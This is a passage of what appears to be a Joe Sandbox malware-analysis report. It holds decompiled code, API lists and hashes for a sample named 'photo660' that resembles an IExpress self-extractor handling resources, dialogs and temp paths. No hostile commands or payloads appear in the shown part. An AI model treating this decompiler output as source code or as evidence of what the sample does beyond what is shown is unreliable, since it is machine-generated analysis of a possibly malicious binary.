                                                                                                                                                                                                        										E00BC44B9(0, 0x54b, "photo660", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xbc8588);
                                                                                                                                                                                                        										 *0xbc9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xbc9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00bc2dde
                                                                                                                                                                                                        0x00bc2de3
                                                                                                                                                                                                        0x00bc2e04
                                                                                                                                                                                                        0x00bc2e0a
                                                                                                                                                                                                        0x00bc2e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2e10
                                                                                                                                                                                                        0x00bc2dd3
                                                                                                                                                                                                        0x00bc2dbb
                                                                                                                                                                                                        0x00bc2da1
                                                                                                                                                                                                        0x00bc2d5b
                                                                                                                                                                                                        0x00bc2d5b
                                                                                                                                                                                                        0x00bc2d5d
                                                                                                                                                                                                        0x00bc2d69
                                                                                                                                                                                                        0x00bc2d6e
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2f06
                                                                                                                                                                                                        0x00bc2d59
                                                                                                                                                                                                        0x00bc2f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2CF9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC2E0A
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: ac6ecb72dde441774bc60c9082fd72ebb2cfd823310f95c484a3f593c9b33b9c
                                                                                                                                                                                                        • Instruction ID: 9a023c5ced9c7a5c253ad16342b94272f2729960eb3a3ba4fbc0829fc5c5b287
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac6ecb72dde441774bc60c9082fd72ebb2cfd823310f95c484a3f593c9b33b9c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF51C070740306ABF724AB259C5AF7B36D8EB9A704F1440BDF942E62E5DFB4C841CA25
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00BC34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xbc91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xbc8584 = _t35;
                                                                                                                                                                                                        					E00BC43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xbc8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "photo660");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00BC4FE0, 0, 0, 0xbc8798);
                                                                                                                                                                                                        					 *0xbc879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E00BC44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xbc858c);
                                                                                                                                                                                                        					_t38 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        					_t25 = E00BC44B9(_t38, 0x4b2, 0xbc1140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xbc91d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xbc858c);
                                                                                                                                                                                                        						_t39 =  *0xbc879c; // 0x0
                                                                                                                                                                                                        						E00BC3680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xbc858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xbc879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00BC3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00BC355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00BC1140,00000000,00000020,00000004), ref: 00BC3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00BC35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00BC35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00BC3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00BC3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00BC3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: 7d799d19e103bd0dfb244467e8809736c965b87b7ed5e1f8dd994ed15ba4c50e
                                                                                                                                                                                                        • Instruction ID: d71852f4133f6c9bac365de0c878bdee84f051e19e36f0fa37d0dad14d6c6565
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d799d19e103bd0dfb244467e8809736c965b87b7ed5e1f8dd994ed15ba4c50e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F31AE31244304BBD7201F25AC4DF2B3AE8E79EF05F98856DF612A72A4CF758A00DB65
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00BC4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00BC44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xbc88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xbc87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xbc8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00BC4200;
                                                                                                                                                                                                        					_v28 = 0xbc88c0;
                                                                                                                                                                                                        					 *0xbca288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xbca288(_t32, 0xbc88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xbc88c0 != 0) {
                                                                                                                                                                                                        							E00BC1680(0xbc87a0, 0x104, 0xbc88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xbca288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xbc87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xbc88c0);
                                                                                                                                                                                                        					_t61 = 0xbc88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xbc88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xbc88c0; // 0x1791181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xbc88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xbc88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00bc42a5
                                                                                                                                                                                                        0x00bc42aa
                                                                                                                                                                                                        0x00bc42aa
                                                                                                                                                                                                        0x00bc42ad
                                                                                                                                                                                                        0x00bc42ad
                                                                                                                                                                                                        0x00bc42af
                                                                                                                                                                                                        0x00bc42b0
                                                                                                                                                                                                        0x00bc42b6
                                                                                                                                                                                                        0x00bc42c2
                                                                                                                                                                                                        0x00bc42c8
                                                                                                                                                                                                        0x00bc42ce
                                                                                                                                                                                                        0x00bc42e4
                                                                                                                                                                                                        0x00bc42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00BC4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00BC424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00BC4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00BC427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00BC88C0,?,00000001), ref: 00BC429F
                                                                                                                                                                                                        • CharPrevA.USER32(00BC88C0,01791181,?,00000001), ref: 00BC42C2
                                                                                                                                                                                                        • CharPrevA.USER32(00BC88C0,00000000,?,00000001), ref: 00BC42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00BC4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00BC43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 52e91709e27a2e23e6135429671c7143f46dafd2b0a22b8ebed26c82df115465
                                                                                                                                                                                                        • Instruction ID: b0bec7e2f4120a9dfc08fa2248a095c84a272ac515bc22618a96954475b826ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52e91709e27a2e23e6135429671c7143f46dafd2b0a22b8ebed26c82df115465
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC41E274A00244AFD711AB64DCA9FAE7BF4EB89348F0401ADE941A7291CF748E018765
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xbc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xbc9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00BC1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00BC171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00BC171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00BC681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00BC67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16);
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00BC681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00BC67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
